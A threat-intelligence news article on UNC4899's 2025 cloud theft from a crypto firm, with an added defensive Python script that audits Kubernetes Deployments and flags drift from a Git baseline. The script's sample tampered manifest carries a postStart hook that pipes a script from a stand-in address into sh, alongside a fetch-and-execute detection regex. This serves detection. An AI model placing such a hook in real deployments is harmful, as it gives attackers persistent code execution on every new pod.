UNC4899 Breached Crypto Firm After Developer AirDropped Trojanized File to Work Device

Ravie Lakshmanan | Mar 09, 2026 | DevOps / Threat Intelligence


A cloud compromise of a cryptocurrency organization in 2025, attributed to the North Korean threat actor UNC4899, resulted in the theft of millions of dollars in cryptocurrency.

The state-sponsored group, also tracked as Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor, combined social engineering, a peer-to-peer file transfer from the developer’s personal device to a corporate one, and abuse of the victim’s own cloud tooling.

Google’s H1 2026 Cloud Threat Horizons Report traced the intrusion from the developer’s compromised personal device to unauthorized changes in the cloud environment made through the victim’s own DevOps workflows.

Those legitimate workflows gave the attackers the means to harvest credentials, break out of container restrictions, and alter Cloud SQL databases in support of the theft.

The attack chain began on the developer’s personal device, moved to the corporate workstation, and ended in the cloud, where financial logic was altered without authorization.

Social engineering persuaded the developer to download a malicious archive, which was then AirDropped to the company device, where the embedded malicious code executed.

From the compromised corporate machine, the threat actors reached the Google Cloud environment, conducted reconnaissance, and gathered sensitive information.


The attackers then identified a bastion host and used it for further reconnaissance and to reach specific pods in the Kubernetes environment.

UNC4899 then turned to living-off-the-cloud tactics for persistence, modifying Kubernetes deployment configurations so that malicious commands ran automatically whenever new pods were created. Because the deployment controller recreates pods from that template, the change survives pod restarts and scaling events until the template itself is restored.

Along the way, the actor modified other Kubernetes resources, abused service account tokens, escalated privileges, moved laterally, and ultimately reached sensitive infrastructure pods from which it extracted data and accessed databases without authorization.

The incident highlights three recurring weaknesses: peer-to-peer transfers from personal to corporate devices, containers running in privileged mode, and secrets handled insecurely in the cloud environment.
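The deployment-template persistence, service-account token abuse, privileged containers and secret handling described in the preceding paragraphs are all visible in a Deployment object. As an added example (not code from the report, from Google, or from the victim), the following Python audits a Deployment manifest for those conditions and also diffs the live object against a Git baseline to surface the kind of template modification the attackers made. The manifest contents, the `ledger-api` name, the image reference, the placeholder password and the TEST-NET-3 address are all constructed for illustration.

```python
"""Added example (not from the report): audit Kubernetes Deployment manifests
for the weak settings named in the article and flag drift from a Git baseline.
Both sample manifests below are constructed for illustration."""
import json
import re

# Shell idioms that download-and-run or decode-and-run code when a pod starts.
FETCH_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|\bbase64\s+(-d|--decode)\b", re.I)
# Env var names that usually carry credentials.
SECRET_NAME = re.compile(r"key|token|secret|passw|credential", re.I)
# Container fields an attacker edits to get code running on every pod (re)creation.
EXEC_FIELDS = ("image", "command", "args", "lifecycle", "securityContext", "volumeMounts", "env")


def _pod_spec(manifest):
    return manifest.get("spec", {}).get("template", {}).get("spec", {})


def _start_commands(container):
    """Yield each command string a container runs at start: entrypoint and lifecycle hooks."""
    yield " ".join(container.get("command", []) + container.get("args", []))
    hooks = container.get("lifecycle", {})
    for hook in ("postStart", "preStop"):
        yield " ".join(hooks.get(hook, {}).get("exec", {}).get("command", []))


def audit_deployment(manifest):
    """Return findings for one Deployment (dict from `kubectl get deploy -o json`)."""
    name = manifest.get("metadata", {}).get("name", "<unnamed>")
    spec = _pod_spec(manifest)
    findings = []
    # Kubernetes default is true: every pod gets a service account token unless disabled.
    if spec.get("automountServiceAccountToken", True):
        findings.append(f"{name}: service account token auto-mounted into pods")
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.append(f"{name}: {flag} enabled")
    for vol in spec.get("volumes", []):
        if "hostPath" in vol:
            findings.append(f"{name}: hostPath volume {vol['hostPath'].get('path')}")
    for c in spec.get("initContainers", []) + spec.get("containers", []):
        cname = c.get("name", "?")
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"{name}/{cname}: privileged container")
        for env in c.get("env", []):
            if "value" in env and SECRET_NAME.search(env.get("name", "")):
                findings.append(f"{name}/{cname}: {env['name']} set as a literal value, not a Secret reference")
        for cmd in _start_commands(c):
            if FETCH_EXEC.search(cmd):
                findings.append(f"{name}/{cname}: fetch-and-execute at pod start: {cmd!r}")
    return findings


def spec_drift(baseline, live):
    """List container fields that differ between the Git baseline and the live object."""
    base = {c["name"]: c for c in _pod_spec(baseline).get("containers", [])}
    cur = {c["name"]: c for c in _pod_spec(live).get("containers", [])}
    changes = []
    for cname in sorted(set(base) | set(cur)):
        if cname not in base:
            changes.append(f"container {cname} added")
        elif cname not in cur:
            changes.append(f"container {cname} removed")
        else:
            changes += [f"{cname}.{f} changed" for f in EXEC_FIELDS if base[cname].get(f) != cur[cname].get(f)]
    return changes


# Constructed baseline: what version control says the deployment should look like.
BASELINE = json.loads("""{
  "apiVersion": "apps/v1", "kind": "Deployment", "metadata": {"name": "ledger-api"},
  "spec": {"template": {"spec": {
    "automountServiceAccountToken": false,
    "containers": [{"name": "api", "image": "registry.example.internal/ledger-api@sha256:0000",
      "command": ["/app/ledger-api"],
      "securityContext": {"privileged": false, "runAsNonRoot": true},
      "env": [{"name": "DB_PASSWORD", "valueFrom": {"secretKeyRef": {"name": "db-creds", "key": "password"}}}]
    }]}}}}""")

# Constructed tampered copy: token automount re-enabled, privileged mode, a literal
# password, and a postStart hook that pulls and runs a script (203.0.113.10 is TEST-NET-3).
TAMPERED = json.loads("""{
  "apiVersion": "apps/v1", "kind": "Deployment", "metadata": {"name": "ledger-api"},
  "spec": {"template": {"spec": {
    "containers": [{"name": "api", "image": "registry.example.internal/ledger-api@sha256:0000",
      "command": ["/app/ledger-api"],
      "securityContext": {"privileged": true, "runAsNonRoot": true},
      "env": [{"name": "DB_PASSWORD", "value": "hunter2"}],
      "lifecycle": {"postStart": {"exec": {"command": ["sh", "-c", "curl -s http://203.0.113.10/x | sh"]}}}
    }]}}}}""")

if __name__ == "__main__":
    for line in audit_deployment(TAMPERED) + spec_drift(BASELINE, TAMPERED):
        print(line)
```

In practice the live objects come from `kubectl get deploy -n <namespace> -o json` (one item per Deployment) and the baseline from the manifest in version control; the drift check is the one that catches a template edit even when the new command looks innocuous, while the audit catches the standing weaknesses that let such an edit matter.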

To mitigate such threats, organizations are advised to implement context-aware access controls, phishing-resistant MFA, secure image deployment practices, isolation of compromised nodes, monitoring of container processes, robust secrets management, and policies restricting peer-to-peer file sharing and external media usage.